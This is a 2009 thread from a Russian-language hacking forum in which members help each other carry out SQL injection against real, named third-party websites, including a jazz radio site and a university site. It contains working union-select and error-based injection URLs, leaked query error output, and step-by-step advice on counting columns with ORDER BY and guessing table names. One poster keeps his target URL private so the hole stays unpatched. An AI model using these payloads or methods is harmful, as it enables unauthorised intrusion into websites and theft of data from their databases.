29.03.2009, 23:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://www.tsfjazz.com/podcast-detail.php?id=-3/**/union/**/select/**/version(),2,3,4,5
|
|
|
29.03.2009, 23:21
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
2 Pashkela
Што за брет, почему 5 их ?
Когда , на 3 толко нормално отобразает страницу =(
|
|
|
|
29.03.2009, 23:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Saiga
2 Pashkela
Што за брет, почему 5 их ?
Когда , на 3 толко нормално отобразает страницу =(
order by юзай
|
|
|
|
29.03.2009, 23:28
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Saiga
2 Pashkela
Што за брет, почему 5 их ?
Когда , на 3 толко нормално отобразает страницу =(
Сначала подбери кол-во полей через order+by+..., т.е. order+by+1 -ошибка? значит больше, и так д минимального числа пока нету ошибки) А вообще почитай темы про SQL-inj - там лучше написано 
|
|
|
|
29.03.2009, 23:34
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
2 попугай
Видел што советавали ползоваца group а не order
но не ветом дело .
2 Tigger
Ето я знаю , видемо изменение в тексте ошибки ,можно взят как ответ ... Вот и ответил сам на свои вопрос )
|
|
|
|
29.03.2009, 23:43
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Там два запроса, их отлично видно в ошибке
1-й 3 поля, без вывода
Erreur dans la requete : select titre, date_format(datd, '%d/%m/%Y') as dd, id from podc where id_prg=3/**/order/**/by/**/4/* order by datd desc, titre
2-ой 5 полей выводится
Erreur dans la requete : select nom, anim, photo, corps, horaire from prog where id=3/**/order/**/by/**/6/*
|
|
|
|
30.03.2009, 00:06
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 5
С нами:
9010448
Репутация:
0
|
|
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)
запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*
Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
|
|
|
|
30.03.2009, 00:40
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от LLIop0x
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)
запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*
Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
Это означает, что колонки "name" не найденно
|
|
|
|
30.03.2009, 01:01
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами:
9081715
Репутация:
10
|
|
У меня вопрос по MS Access. Есть сайт http://www.ruw.edu.bh/template2.asp?id=218
Подобрал кол-во полей с помощью order+by, их оказалось 13. Попробовал угадать имя таблицы, угадал таблицу user. Но при таком запросе
http://www.ruw.edu.bh/template2.asp?id=-218+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+fro m+user
Выводит какую-то ошибку...( Что я не так делаю?
|
|
|
|
30.03.2009, 01:34
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Access имеет зарезервированные слова и символы которые нельзя использовать абы как 
В данном случае ничего ты не нашёл, user не может быть таблицей, как и любое из этих слов :
http://office.microsoft.com/ru-ru/access/HA100306431049.aspx |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
